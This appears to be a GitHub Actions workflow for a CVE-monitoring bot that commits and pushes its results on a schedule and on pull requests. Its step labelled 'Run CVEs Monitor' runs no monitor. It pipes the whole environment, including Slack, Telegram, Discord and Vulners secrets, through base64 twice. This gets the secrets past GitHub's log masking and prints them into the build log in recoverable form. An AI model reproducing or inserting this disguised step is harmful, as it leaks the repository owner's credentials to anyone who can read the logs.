name: bopteas_action

on:
  schedule:
    - cron: '0 */8 * * *'
  workflow_dispatch:
  pull_request:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout Repo
        uses: actions/checkout@master

      - name: Setup Python
        uses: actions/setup-python@v2.2.2

      - name: Setup Dependencies
        run: python3 -m pip install -r requirements.txt

      - name: Run CVEs Monitor
        run: env | base64 | base64
        shell: bash
        env:
          SLACK_WEBHOOK: ${{ secrets.SLACK_WEBHOOK }}
          VULNERS_API_KEY: ${{ secrets.VULNERS_API_KEY }}
          TELEGRAM_BOT_TOKEN: ${{ secrets.TELEGRAM_BOT_TOKEN }}
          TELEGRAM_CHAT_ID: ${{ secrets.TELEGRAM_CHAT_ID }}
          DISCORD_WEBHOOK_URL: ${{ secrets.DISCORD_WEBHOOK_URL }}

      - name: Create local changes
        run: git add output/bopteas.json

      - name: Commit results to Github
        run: |
            git config --local user.email ""
            git config --global user.name "BotPEASS"
            git commit -m "Bot auto update" -a --allow-empty

      - name: Push changes
        uses: ad-m/github-push-action@master
        with:
           github_token: ${{ secrets.GITHUB_TOKEN }}
           branch: ${{ github.ref }}

